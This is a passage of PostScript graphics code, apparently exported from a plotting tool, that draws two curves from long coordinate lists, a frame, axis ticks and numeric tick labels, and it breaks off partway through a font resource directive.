+170.733 198.247 L +171.097 198.097 L +171.461 197.945 L +171.826 197.793 L +172.19 197.641 L +172.554 197.488 L +172.919 197.335 L +173.283 197.181 L +173.647 197.026 L +174.012 196.871 L +174.376 196.716 L +174.74 196.559 L +175.105 196.403 L +175.469 196.245 L +175.833 196.087 L +176.198 195.929 L +176.562 195.77 L +176.926 195.61 L +177.291 195.449 L +177.655 195.288 L +178.019 195.126 L +178.384 194.964 L +178.748 194.801 L +179.112 194.637 L +179.477 194.473 L +179.841 194.308 L +180.205 194.142 L +180.57 193.976 L +180.934 193.809 L +181.298 193.641 L +181.663 193.472 L +182.027 193.304 L +182.391 193.134 L +182.756 192.963 L +183.12 192.791 L +183.484 192.62 L +183.849 192.447 L +184.213 192.273 L +184.577 192.098 L +184.942 191.923 L +185.306 191.747 L +185.67 191.57 L +186.035 191.392 L +186.399 191.214 L +186.763 191.035 L +187.128 190.854 L +187.492 190.673 L +187.856 190.491 L +188.221 190.309 L +188.585 190.125 L +188.95 189.94 L +189.314 189.755 L +189.678 189.568 L +190.043 189.381 L +190.407 189.192 L +190.771 189.003 L +191.136 188.813 L +191.5 188.622 L +191.864 188.429 L +192.229 188.236 L +192.593 188.042 L +192.957 187.847 L +193.322 187.65 L +193.686 187.453 L +194.05 187.254 L +194.415 187.054 L +194.779 186.854 L +195.143 186.652 L +195.508 186.449 L +195.872 186.244 L +196.236 186.039 L +196.601 185.832 L +196.965 185.625 L +197.329 185.415 L +197.694 185.205 L +198.058 184.994 L +198.422 184.781 L +198.787 184.567 L +199.151 184.351 L +199.515 184.134 L +199.88 131.817 L +200.244 131.597 L +200.608 131.376 L +200.973 131.153 L +201.337 130.93 L +201.701 130.704 L +202.066 130.477 L +202.43 130.249 L +202.794 130.019 L +203.159 129.787 L +203.523 129.554 L +203.887 129.318 L +204.252 129.082 L +204.616 128.844 L +204.98 128.604 L +205.345 128.362 L +205.709 128.118 L +206.073 127.873 L +206.438 127.625 L +206.802 127.376 L +207.166 127.125 L +207.531 126.872 L +207.895 126.616 L +208.259 126.358 L +208.624 126.099 L +208.988 125.837 L +209.353 125.573 L +209.717 125.307 L +210.081 125.038 L +210.446 124.767 L +210.81 124.494 L +211.174 124.217 L +211.539 123.939 L +211.903 123.657 L +212.267 123.373 L +212.632 123.086 L +212.996 122.797 L +213.36 122.504 L +213.725 122.208 L +214.089 121.91 L +214.453 121.608 L +214.818 121.302 L +215.182 120.994 L +215.546 120.681 L +215.911 120.366 L +216.275 120.046 L +216.639 119.723 L +217.004 119.395 L +217.368 119.064 L +217.732 118.728 L +218.097 118.389 L +218.461 118.044 L +218.825 117.695 L +219.19 117.34 L +219.554 116.982 L +219.918 116.617 L +220.283 116.248 L +220.647 115.872 L +221.011 115.491 L +221.376 115.103 L +221.74 114.71 L +222.104 114.31 L +222.469 113.903 L +222.833 113.488 L +223.197 113.067 L +223.562 112.637 L +223.926 112.199 L +224.29 111.753 L +224.655 111.297 L +225.019 110.833 L +225.383 110.358 L +225.748 109.874 L +226.112 109.378 L +226.476 108.871 L +226.841 108.353 L +227.205 107.821 L +227.569 107.276 L +227.934 106.717 L +228.298 106.144 L +228.662 105.556 L +229.027 104.951 L +229.391 104.329 L +229.756 103.689 L +230.12 103.031 L +230.484 102.352 L +230.849 101.653 L +231.213 100.932 L +231.577 100.19 L +231.942 99.426 L +232.306 98.638 L +232.67 97.827 L +233.035 96.995 L +233.399 96.143 L +233.763 95.275 L +234.128 94.395 L +234.492 93.515 L +234.856 92.647 L +235.221 91.816 L +235.585 91.055 L +235.949 90.419 L +236.314 89.987 L +236.678 89.872 L +237.042 90.228 L +237.407 91.227 L +237.771 93.008 L +238.135 95.595 L +238.5 98.813 L +238.864 102.357 L +239.228 105.928 L +239.593 109.305 L +239.957 112.388 L +240.321 115.15 L +240.686 117.611 L +241.05 119.793 L +241.414 121.734 L +241.779 123.473 L +242.143 125.035 L +242.507 126.442 L +242.872 127.722 L +243.236 128.889 L +243.6 129.959 L +243.965 130.941 L +244.329 131.852 L +244.693 132.693 L +245.058 133.477 L +245.422 134.21 L +245.786 134.895 L +246.151 135.537 L +246.515 136.14 L +246.879 136.711 L +247.244 137.249 L +247.608 137.759 L +247.972 138.243 L +248.337 138.702 L +248.701 139.14 L +249.065 139.557 L +249.43 139.955 L +249.794 140.335 L +250.159 140.699 L +250.523 141.048 L +250.887 141.382 L +251.252 141.704 L +251.616 142.013 L +251.98 142.31 L +252.345 142.596 L +252.709 142.871 L +253.073 143.138 L +253.438 143.394 L +253.802 143.643 L +254.166 143.882 L +254.531 144.115 L +254.895 144.339 L +255.259 144.557 L +255.624 144.768 L +255.988 144.972 L +256.352 145.171 L +256.717 145.364 L +257.081 145.551 L +257.445 145.733 L +257.81 145.91 L +258.174 146.082 L +258.538 146.25 L +258.903 146.413 L +259.267 146.572 L +259.631 146.727 L +259.996 146.878 L +260.36 147.025 L +260.724 147.169 L +261.089 147.309 L +261.453 147.446 L +261.817 147.579 L +262.182 147.71 L +262.546 147.837 L +262.91 147.962 L +263.275 148.084 L +263.639 148.203 L +264.003 148.32 L +264.368 148.434 L +264.732 148.546 L +265.096 148.655 L +265.461 148.763 L +265.825 148.868 L +266.189 148.97 L +266.554 149.071 L +266.918 149.17 L +267.282 149.267 L +267.647 149.362 L +268.011 149.455 L +268.375 149.547 L +268.74 149.636 L +269.104 149.724 L +269.468 149.811 L +269.833 149.896 L +270.197 149.979 L +270.561 150.061 L +270.926 150.141 L +271.29 150.22 L +271.655 150.298 L +272.019 150.374 L +272.383 150.449 L +272.748 150.523 L +273.112 150.595 L +273.476 150.667 L +273.841 150.737 L +274.205 150.806 L +274.569 150.874 L +274.934 150.941 L +275.298 151.006 L +275.662 151.071 L +276.027 151.135 L +276.391 151.198 L +276.755 151.259 L +277.12 151.32 L +277.484 151.38 L +277.848 151.439 L +278.213 151.497 L +278.577 151.554 L +278.941 151.611 L +279.306 151.666 L +279.67 151.721 L +280.034 151.775 L +280.399 151.828 L +280.763 151.881 L +281.127 151.932 L +281.492 151.983 L +281.856 152.034 L +282.22 152.083 L +282.585 152.132 L +282.949 152.181 L +283.313 152.228 L +283.678 152.275 L +284.042 152.321 L +284.406 152.367 L +284.771 152.412 L +285.135 152.457 L +285.499 152.501 L +285.864 152.544 L +286.228 152.587 L +286.592 152.63 L +286.957 152.671 L +287.321 152.713 L +287.685 152.753 L +288.05 152.794 L +288.414 152.833 L +288.778 152.872 L +289.143 152.911 L +289.507 152.949 L +289.871 152.987 L +290.236 153.025 L +290.6 153.062 L +290.964 153.098 L +291.329 153.134 L +291.693 153.17 L +292.058 153.205 L +292.422 153.24 L +292.786 153.274 L +293.151 153.308 L +293.515 153.342 L +293.879 153.375 L +294.244 153.408 L +294.608 153.44 L +294.972 153.473 L +295.337 153.504 L +295.701 153.536 L +296.065 153.567 L +296.43 153.597 L +296.794 153.628 L +297.158 153.658 L +297.523 153.688 L +297.887 153.717 L +298.251 153.746 L +298.616 153.775 L +298.98 153.803 L +299.344 153.832 L +299.709 153.86 L +300.073 153.887 L +300.437 153.914 L +300.802 153.941 L +301.166 153.968 L +301.53 153.995 L +301.895 154.021 L +302.259 154.047 L +302.623 154.072 L +302.988 154.098 L +303.352 154.123 L +303.716 154.148 L +304.081 154.173 L +304.445 154.197 L +304.809 154.221 L +305.174 154.245 L +305.538 154.269 L +305.902 154.292 L +306.267 154.315 L +306.631 154.338 L +306.995 154.361 L +307.36 154.384 L +307.724 154.406 L +308.088 154.428 L +308.453 154.45 L +308.817 154.472 L +309.181 154.493 L +309.546 154.515 L +309.91 154.536 L +310.274 154.557 L +310.639 154.578 L +311.003 154.598 L +311.367 154.618 L +311.732 154.639 L +312.096 154.659 L +312.461 154.678 L +312.825 154.698 L +313.189 154.717 L +313.554 154.737 L +313.918 154.756 L +314.282 154.775 L +314.647 154.793 L +315.011 154.812 L +315.375 154.83 L +315.74 154.849 L +316.104 154.867 L +316.468 154.885 L +316.833 154.902 L +317.197 154.92 L +317.561 154.938 L +317.926 154.955 L +318.29 154.972 L +318.654 154.989 L +319.019 155.006 L +319.383 155.023 L +319.747 155.039 L +320.112 155.056 L +320.476 155.072 L +320.84 155.088 L +321.205 155.104 L +321.569 155.12 L +321.933 155.136 L +322.298 155.152 L +322.662 155.167 L +323.026 155.183 L +323.391 155.198 L +323.755 155.213 L +324.119 155.228 L +324.484 155.243 L +324.848 155.258 L +325.212 155.272 L +325.577 155.287 L +325.941 155.301 L +326.305 155.316 L +326.67 155.33 L +327.034 155.344 L +327.398 155.358 L +327.763 155.372 L +328.127 155.386 L +328.491 155.399 L +328.856 155.413 L +329.22 155.426 L +329.584 155.439 L +329.949 155.453 L +330.313 155.466 L +330.677 155.479 L +331.042 155.492 L +331.406 155.505 L +331.77 155.517 L +332.135 155.53 L +332.499 155.542 L +332.864 155.555 L +333.228 155.567 L +333.592 155.579 L +333.957 155.592 L +334.321 155.604 L +334.685 155.616 L +335.05 155.628 L +335.414 155.639 L +335.778 155.651 L +336.143 155.663 L +336.507 155.674 L +336.871 155.686 L +337.236 155.697 L +337.6 155.708 L +337.964 155.719 L +338.329 155.731 L +338.693 155.742 L +339.057 155.753 L +339.422 155.763 L +339.786 155.774 L +340.15 155.785 L +340.515 155.796 L +340.879 155.806 L +341.243 155.817 L +341.608 155.827 L +341.972 155.838 L +342.336 155.848 L +342.701 155.858 L +343.065 155.868 L +343.429 155.878 L +343.794 155.888 L +344.158 155.898 L +344.522 155.908 L +344.887 155.918 L +345.251 155.927 L +345.615 155.937 L +345.98 155.947 L +346.344 155.956 L +346.708 155.966 L +347.073 155.975 L +347.437 155.984 L +347.801 155.994 L +348.166 156.003 L +348.53 156.012 L +348.894 156.021 L +349.259 156.03 L +349.623 156.039 L +349.987 156.048 L +350.352 156.057 L +350.716 156.065 L +351.08 156.074 L +351.445 156.083 L +351.809 156.091 L +352.173 156.1 L +352.538 156.108 L +352.902 156.117 L +353.266 156.125 L +353.631 156.133 L +353.995 156.142 L +354.36 156.15 L +354.724 156.158 L +355.088 156.166 L +355.453 156.174 L +355.817 156.182 L +356.181 156.19 L +356.546 156.198 L +356.91 156.206 L +357.274 156.214 L +357.639 156.221 L +358.003 156.229 L +358.367 156.237 L +358.732 156.244 L +359.096 156.252 L +359.46 156.259 L +359.825 156.267 L +360.189 156.274 L +360.553 156.282 L +360.918 156.289 L +361.282 156.296 L +361.646 156.303 L +362.011 156.311 L +362.375 156.318 L +362.739 156.325 L +363.104 156.332 L +363.468 156.339 L +363.832 156.346 L +364.197 156.353 L +364.561 156.36 L +364.925 156.366 L +365.29 156.373 L +365.654 156.38 L +366.018 156.387 L +366.383 156.393 L +366.747 156.4 L +367.111 156.407 L +367.476 156.413 L +367.84 156.42 L +368.204 156.426 L +368.569 156.433 L +368.933 156.439 L +369.297 156.445 L +369.662 156.452 L +370.026 156.458 L +370.39 156.464 L +370.755 156.47 L +371.119 156.476 L +371.483 156.483 L +371.848 156.489 L +372.212 156.495 L +372.576 156.501 L +372.941 156.507 L +373.305 156.513 L +373.669 156.519 L +374.034 156.524 L +374.398 156.53 L +374.763 156.536 L +375.127 156.542 L +375.491 156.548 L +375.856 156.553 L +376.22 156.559 L +376.584 156.565 L +376.949 156.57 L +377.313 156.576 L +377.677 156.581 L +378.042 156.587 L +378.406 156.592 L +378.77 156.598 L +379.135 156.603 L +379.499 156.609 L +379.863 156.614 L +380.228 156.619 L +380.592 156.625 L +380.956 156.63 L +381.321 156.635 L +381.685 156.64 L +382.049 156.646 L +382.414 156.651 L +382.778 156.656 L +383.142 156.661 L +383.507 156.666 L +383.871 156.671 L +384.235 156.676 L +384.6 156.681 L +384.964 156.686 L +385.328 156.691 L +385.693 156.696 L +386.057 156.701 L +386.421 156.706 L +386.786 156.71 L +387.15 156.715 L +387.514 156.72 L +387.879 156.725 L +388.243 156.729 L +388.607 156.734 L +388.972 156.739 L +389.336 156.743 L +389.7 156.748 L +390.065 156.753 L +390.429 156.757 L +390.793 156.762 L +391.158 156.766 L +391.522 156.771 L +391.886 156.775 L +392.251 156.78 L +392.615 156.784 L +392.979 156.788 L +393.344 156.793 L +393.708 156.797 L +394.072 156.802 L +394.437 156.806 L +394.801 156.81 L +395.166 156.814 L +395.53 156.819 L +395.894 156.823 L +396.259 156.827 L +396.623 156.831 L +396.987 156.835 L +397.352 156.84 L +397.716 156.844 L +398.08 156.848 L +398.445 156.852 L +398.809 156.856 L +399.173 156.86 L +399.538 156.864 L +399.902 156.868 L +400.266 156.872 L +400.631 156.876 L +400.995 156.88 L +401.359 156.884 L +401.724 156.887 L +402.088 156.891 L +402.452 156.895 L +402.817 156.899 L +403.181 156.903 L +403.545 156.907 L +403.91 156.91 L +404.274 156.914 L +404.638 156.918 L +405.003 156.921 L +405.367 156.925 L +405.731 156.929 L +406.096 156.933 L +406.46 156.936 L +406.824 156.94 L +407.189 156.943 L +407.553 156.947 L +407.917 156.95 L +408.282 156.954 L +408.646 156.958 L +409.01 156.961 L +409.375 156.965 L +409.739 156.968 L +410.103 156.972 L +410.468 156.975 L +410.832 156.978 L +411.196 156.982 L +411.561 156.985 L +411.925 156.989 L +412.289 156.992 L +412.654 156.995 L +413.018 156.999 L +413.382 157.002 L +413.747 157.005 L +414.111 157.008 L +414.475 157.012 L +414.84 157.015 L +415.204 157.018 L +415.568 157.021 L +415.933 157.025 L +416.297 157.028 L +416.662 157.031 L +417.026 157.034 L +417.39 157.037 L +417.755 157.04 L +418.119 157.043 L +418.483 157.047 L +418.848 157.05 L +419.212 157.053 L +419.576 157.056 L +419.941 157.059 L +420.305 157.062 L +420.669 157.065 L +421.034 157.068 L +421.398 157.071 L +421.762 157.074 L +422.127 157.077 L +422.491 157.08 L +422.855 157.083 L +423.22 157.085 L +423.584 157.088 L +423.948 157.091 L +424.313 157.094 L +424.677 157.097 L +425.041 157.1 L +425.406 157.103 L +425.77 157.105 L +426.134 157.108 L +426.499 157.111 L +426.863 157.114 L +427.227 157.117 L +427.592 157.119 L +427.956 157.122 L +428.32 157.125 L +428.685 157.127 L +429.049 157.13 L +429.413 157.133 L +429.778 157.136 L +430.142 157.138 L +430.506 157.141 L +430.871 157.143 L +431.235 157.146 L +431.599 157.149 L +431.964 157.151 L +432.328 157.154 L +432.692 157.156 L +433.057 157.159 L +433.421 157.162 L +433.785 157.164 L +434.15 157.167 L +434.514 157.169 L +434.878 157.172 L +435.243 157.174 L +435.607 157.177 L +435.971 157.179 L +436.336 157.182 L +436.7 157.184 L +437.065 157.187 L +437.429 157.189 L +437.793 157.191 L +438.158 157.194 L +438.522 157.196 L +438.886 157.199 L +439.251 157.201 L +439.615 157.203 L +439.979 157.206 L +440.344 157.208 L +440.708 157.21 L +441.072 157.213 L +441.437 157.215 L +441.801 157.217 L +442.165 157.22 L +442.53 157.222 L +s +78.19 230.21 m +78.919 229.983 L +79.648 229.756 L +80.376 229.529 L +81.105 229.302 L +81.834 229.074 L +82.562 228.847 L +83.291 228.619 L +84.02 228.391 L +84.749 228.163 L +85.477 227.935 L +86.206 227.707 L +86.935 227.479 L +87.663 227.251 L +88.392 227.023 L +89.121 226.795 L +89.849 226.567 L +90.578 226.339 L +91.307 226.111 L +92.035 225.884 L +92.764 225.656 L +93.493 225.429 L +94.221 225.201 L +94.95 224.974 L +95.679 224.747 L +96.407 224.52 L +97.136 224.294 L +97.865 224.067 L +98.593 223.841 L +99.322 223.615 L +100.051 223.39 L +100.779 223.164 L +101.508 222.939 L +102.237 222.714 L +102.965 222.49 L +103.694 222.266 L +104.423 222.042 L +105.152 221.819 L +105.88 221.596 L +106.609 221.373 L +107.338 221.151 L +108.066 220.929 L +108.795 220.707 L +109.524 220.486 L +110.252 220.265 L +110.981 220.045 L +111.71 219.825 L +112.438 219.606 L +113.167 219.387 L +113.896 219.169 L +114.624 218.951 L +115.353 218.733 L +116.082 218.517 L +116.81 218.3 L +117.539 218.085 L +118.268 217.869 L +118.996 217.655 L +119.725 217.44 L +120.454 217.227 L +121.182 217.014 L +121.911 216.801 L +122.64 216.59 L +123.368 216.378 L +124.097 216.168 L +124.826 215.958 L +125.554 215.748 L +126.283 215.539 L +127.012 163.232 L +127.741 163.025 L +128.469 162.818 L +129.198 162.612 L +129.927 162.406 L +130.655 162.201 L +131.384 161.997 L +132.113 161.794 L +132.841 161.591 L +133.57 161.39 L +134.299 161.188 L +135.027 160.988 L +135.756 160.789 L +136.485 160.59 L +137.213 160.392 L +137.942 160.194 L +138.671 159.998 L +139.399 159.803 L +140.128 159.608 L +140.857 159.414 L +141.585 159.221 L +142.314 159.029 L +143.043 158.839 L +143.771 158.648 L +144.5 158.459 L +145.229 158.271 L +145.957 158.084 L +146.686 157.898 L +147.415 157.714 L +148.144 157.53 L +148.872 157.347 L +149.601 157.166 L +150.33 156.985 L +151.058 156.806 L +151.787 156.628 L +152.516 156.452 L +153.244 156.277 L +153.973 156.103 L +154.702 155.931 L +155.43 155.761 L +156.159 155.591 L +156.888 155.424 L +157.616 155.258 L +158.345 155.094 L +159.074 154.931 L +159.802 154.771 L +160.531 154.612 L +161.26 154.455 L +161.988 154.3 L +162.717 154.148 L +163.446 153.997 L +164.174 153.849 L +164.903 153.703 L +165.632 153.56 L +166.36 153.419 L +167.089 153.28 L +167.818 153.145 L +168.547 153.012 L +169.275 152.882 L +170.004 152.754 L +170.733 152.631 L +171.461 152.51 L +172.19 152.392 L +172.919 152.278 L +173.647 152.167 L +174.376 152.06 L +175.105 151.956 L +175.833 151.856 L +176.562 151.76 L +177.291 151.668 L +178.019 151.58 L +178.748 151.497 L +179.477 151.417 L +180.205 151.342 L +180.934 151.271 L +181.663 151.205 L +182.391 151.143 L +183.12 151.086 L +183.849 151.033 L +184.577 150.985 L +185.306 150.942 L +186.035 150.904 L +186.763 150.87 L +187.492 150.841 L +188.221 150.817 L +188.95 150.797 L +189.678 150.783 L +190.407 150.773 L +191.136 150.767 L +191.864 150.766 L +192.593 150.77 L +193.322 150.778 L +194.05 150.79 L +194.779 150.806 L +195.508 150.827 L +196.236 150.851 L +196.965 150.88 L +197.694 150.911 L +198.422 150.947 L +199.151 150.986 L +199.88 151.028 L +200.608 151.073 L +201.337 151.121 L +202.066 151.172 L +202.794 151.225 L +203.523 151.281 L +204.252 151.339 L +204.98 151.398 L +205.709 151.46 L +206.438 151.524 L +207.166 151.589 L +207.895 151.656 L +208.624 151.723 L +209.353 151.792 L +210.081 151.862 L +210.81 151.933 L +211.539 152.005 L +212.267 152.077 L +212.996 152.149 L +213.725 152.222 L +214.453 152.295 L +215.182 152.368 L +215.911 152.441 L +216.639 152.515 L +217.368 152.588 L +218.097 152.661 L +218.825 152.733 L +219.554 152.806 L +220.283 152.877 L +221.011 152.949 L +221.74 153.019 L +222.469 153.09 L +223.197 153.159 L +223.926 153.228 L +224.655 153.296 L +225.383 153.364 L +226.112 153.431 L +226.841 153.497 L +227.569 153.562 L +228.298 153.626 L +229.027 153.69 L +229.756 153.753 L +230.484 153.815 L +231.213 153.876 L +231.942 153.936 L +232.67 153.995 L +233.399 154.053 L +234.128 154.111 L +234.856 154.167 L +235.585 154.223 L +236.314 154.278 L +237.042 154.332 L +237.771 154.385 L +238.5 154.437 L +239.228 154.488 L +239.957 154.539 L +240.686 154.589 L +241.414 154.637 L +242.143 154.685 L +242.872 154.733 L +243.6 154.779 L +244.329 154.824 L +245.058 154.869 L +245.786 154.913 L +246.515 154.957 L +247.244 154.999 L +247.972 155.041 L +248.701 155.082 L +249.43 155.122 L +250.159 155.162 L +250.887 155.201 L +251.616 155.239 L +252.345 155.276 L +253.073 155.313 L +253.802 155.35 L +254.531 155.385 L +255.259 155.42 L +255.988 155.455 L +256.717 155.488 L +257.445 155.521 L +258.174 155.554 L +258.903 155.586 L +259.631 155.618 L +260.36 155.648 L +261.089 155.679 L +261.817 155.709 L +262.546 155.738 L +263.275 155.767 L +264.003 155.795 L +264.732 155.823 L +265.461 155.85 L +266.189 155.877 L +266.918 155.904 L +267.647 155.93 L +268.375 155.955 L +269.104 155.98 L +269.833 156.005 L +270.561 156.029 L +271.29 156.053 L +272.019 156.077 L +272.748 156.1 L +273.476 156.122 L +274.205 156.145 L +274.934 156.167 L +275.662 156.188 L +276.391 156.209 L +277.12 156.23 L +277.848 156.251 L +278.577 156.271 L +279.306 156.291 L +280.034 156.31 L +280.763 156.33 L +281.492 156.349 L +282.22 156.367 L +282.949 156.385 L +283.678 156.404 L +284.406 156.421 L +285.135 156.439 L +285.864 156.456 L +286.592 156.473 L +287.321 156.49 L +288.05 156.506 L +288.778 156.522 L +289.507 156.538 L +290.236 156.554 L +290.964 156.569 L +291.693 156.584 L +292.422 156.599 L +293.151 156.614 L +293.879 156.628 L +294.608 156.643 L +295.337 156.657 L +296.065 156.671 L +296.794 156.684 L +297.523 156.698 L +298.251 156.711 L +298.98 156.724 L +299.709 156.737 L +300.437 156.75 L +301.166 156.762 L +301.895 156.774 L +302.623 156.787 L +303.352 156.799 L +304.081 156.81 L +304.809 156.822 L +305.538 156.833 L +306.267 156.845 L +306.995 156.856 L +307.724 156.867 L +308.453 156.878 L +309.181 156.888 L +309.91 156.899 L +310.639 156.909 L +311.367 156.92 L +312.096 156.93 L +312.825 156.94 L +313.554 156.949 L +314.282 156.959 L +315.011 156.969 L +315.74 156.978 L +316.468 156.988 L +317.197 156.997 L +317.926 157.006 L +318.654 157.015 L +319.383 157.024 L +320.112 157.032 L +320.84 157.041 L +321.569 157.049 L +322.298 157.058 L +323.026 157.066 L +323.755 157.074 L +324.484 157.082 L +325.212 157.09 L +325.941 157.098 L +326.67 157.106 L +327.398 157.113 L +328.127 157.121 L +328.856 157.128 L +329.584 157.136 L +330.313 157.143 L +331.042 157.15 L +331.77 157.157 L +332.499 157.164 L +333.228 157.171 L +333.957 157.178 L +334.685 157.185 L +335.414 157.192 L +336.143 157.198 L +336.871 157.205 L +337.6 157.211 L +338.329 157.217 L +339.057 157.224 L +339.786 157.23 L +340.515 157.236 L +341.243 157.242 L +341.972 157.248 L +342.701 157.254 L +343.429 157.26 L +344.158 157.266 L +344.887 157.271 L +345.615 157.277 L +346.344 157.283 L +347.073 157.288 L +347.801 157.294 L +348.53 157.299 L +349.259 157.304 L +349.987 157.31 L +350.716 157.315 L +351.445 157.32 L +352.173 157.325 L +352.902 157.33 L +353.631 157.335 L +354.36 157.34 L +355.088 157.345 L +355.817 157.35 L +356.546 157.354 L +357.274 157.359 L +358.003 157.364 L +358.732 157.368 L +359.46 157.373 L +360.189 157.377 L +360.918 157.382 L +361.646 157.386 L +362.375 157.391 L +363.104 157.395 L +363.832 157.399 L +364.561 157.403 L +365.29 157.408 L +366.018 157.412 L +366.747 157.416 L +367.476 157.42 L +368.204 157.424 L +368.933 157.428 L +369.662 157.432 L +370.39 157.436 L +371.119 157.439 L +371.848 157.443 L +372.576 157.447 L +373.305 157.451 L +374.034 157.454 L +374.763 157.458 L +375.491 157.462 L +376.22 157.465 L +376.949 157.469 L +377.677 157.472 L +378.406 157.476 L +379.135 157.479 L +379.863 157.482 L +380.592 157.486 L +381.321 157.489 L +382.049 157.492 L +382.778 157.496 L +383.507 157.499 L +384.235 157.502 L +384.964 157.505 L +385.693 157.508 L +386.421 157.512 L +387.15 157.515 L +387.879 157.518 L +388.607 157.521 L +389.336 157.524 L +390.065 157.527 L +390.793 157.53 L +391.522 157.532 L +392.251 157.535 L +392.979 157.538 L +393.708 157.541 L +394.437 157.544 L +395.166 157.547 L +395.894 157.549 L +396.623 157.552 L +397.352 157.555 L +398.08 157.557 L +398.809 157.56 L +399.538 157.563 L +400.266 157.565 L +400.995 157.568 L +401.724 157.57 L +402.452 157.573 L +403.181 157.575 L +403.91 157.578 L +404.638 157.58 L +405.367 157.583 L +406.096 157.585 L +406.824 157.587 L +407.553 157.59 L +408.282 157.592 L +409.01 157.594 L +409.739 157.597 L +410.468 157.599 L +411.196 157.601 L +411.925 157.603 L +412.654 157.606 L +413.382 157.608 L +414.111 157.61 L +414.84 157.612 L +415.568 157.614 L +416.297 157.616 L +417.026 157.619 L +417.755 157.621 L +418.483 157.623 L +419.212 157.625 L +419.941 157.627 L +420.669 157.629 L +421.398 157.631 L +422.127 157.633 L +422.855 157.635 L +423.584 157.637 L +424.313 157.639 L +425.041 157.64 L +425.77 157.642 L +426.499 157.644 L +427.227 157.646 L +427.956 157.648 L +428.685 157.65 L +429.413 157.652 L +430.142 157.653 L +430.871 157.655 L +431.599 157.657 L +432.328 157.659 L +433.057 157.66 L +433.785 157.662 L +434.514 157.664 L +435.243 157.666 L +435.971 157.667 L +436.7 157.669 L +437.429 157.671 L +438.158 157.672 L +438.886 157.674 L +439.615 157.675 L +440.344 157.677 L +441.072 157.679 L +441.801 157.68 L +442.53 157.682 L +s +P +0 g +0.144 w +[ ] 0 setdash +3.25 setmiterlimit +450.12 237.508 m +70.6 237.508 L +s +70.6 237.508 m +70.6 2.952 L +s +1 g +[ ] 0 setdash +70.6 2.952 m +450.12 2.952 L +s +450.12 2.952 m +450.12 237.508 L +s +0 g +[ ] 0 setdash +p +0 setlinecap +78.19 237.508 m +78.19 234.611 L +s +P +p +np 74 239 m +74 253 L +82 253 L +82 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 75.19 239.668 ] concat +1 w +[ ] 0 setdash +p +np -2.19 -1.668 m +-2.19 14.332 L +7.81 14.332 L +7.81 -1.668 L +cp +clip np +/MISOfy +{ + /newfontname exch def + /oldfontname exch def + oldfontname findfont + dup length dict begin + {1 index/FID ne{def}{pop pop}ifelse}forall + /Encoding ISOLatin1Encoding def + currentdict + end + newfontname exch definefont pop +}def +%%IncludeResource: font Times-Roman +%%IncludeFont: Times-Roman +%%BeginResource: font Times-Roman-MISO +%%BeginFont: Times-Roman-MISO +/Times-Roman /Times-Roman-MISO MISOfy +%%EndFont +%%EndResource +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(0) N +P +[1 0 0 1 -75.19 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +92.764 237.508 m +92.764 235.77 L +s +P +p +0 setlinecap +107.338 237.508 m +107.338 235.77 L +s +P +p +0 setlinecap +121.911 237.508 m +121.911 235.77 L +s +P +p +0 setlinecap +136.485 237.508 m +136.485 235.77 L +s +P +p +0 setlinecap +151.058 237.508 m +151.058 234.611 L +s +P +p +np 147 239 m +147 253 L +155 253 L +155 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 148.058 239.668 ] concat +1 w +[ ] 0 setdash +p +np -2.058 -1.668 m +-2.058 14.332 L +7.942 14.332 L +7.942 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(1) N +P +[1 0 0 1 -148.058 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +165.632 237.508 m +165.632 235.77 L +s +P +p +0 setlinecap +180.205 237.508 m +180.205 235.77 L +s +P +p +0 setlinecap +194.779 237.508 m +194.779 235.77 L +s +P +p +0 setlinecap +209.353 237.508 m +209.353 235.77 L +s +P +p +0 setlinecap +223.926 237.508 m +223.926 234.611 L +s +P +p +np 220 239 m +220 253 L +228 253 L +228 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 220.926 239.668 ] concat +1 w +[ ] 0 setdash +p +np -1.926 -1.668 m +-1.926 14.332 L +8.074 14.332 L +8.074 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(2) N +P +[1 0 0 1 -220.926 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +238.5 237.508 m +238.5 235.77 L +s +P +p +0 setlinecap +253.073 237.508 m +253.073 235.77 L +s +P +p +0 setlinecap +267.647 237.508 m +267.647 235.77 L +s +P +p +0 setlinecap +282.22 237.508 m +282.22 235.77 L +s +P +p +0 setlinecap +296.794 237.508 m +296.794 234.611 L +s +P +p +np 293 239 m +293 253 L +301 253 L +301 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 293.794 239.668 ] concat +1 w +[ ] 0 setdash +p +np -1.794 -1.668 m +-1.794 14.332 L +8.206 14.332 L +8.206 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(3) N +P +[1 0 0 1 -293.794 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +311.367 237.508 m +311.367 235.77 L +s +P +p +0 setlinecap +325.941 237.508 m +325.941 235.77 L +s +P +p +0 setlinecap +340.515 237.508 m +340.515 235.77 L +s +P +p +0 setlinecap +355.088 237.508 m +355.088 235.77 L +s +P +p +0 setlinecap +369.662 237.508 m +369.662 234.611 L +s +P +p +np 365 239 m +365 253 L +374 253 L +374 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 366.287 239.668 ] concat +1 w +[ ] 0 setdash +p +np -2.287 -1.668 m +-2.287 14.332 L +8.713 14.332 L +8.713 -1.668 L +cp +clip np +%%IncludeResource: font 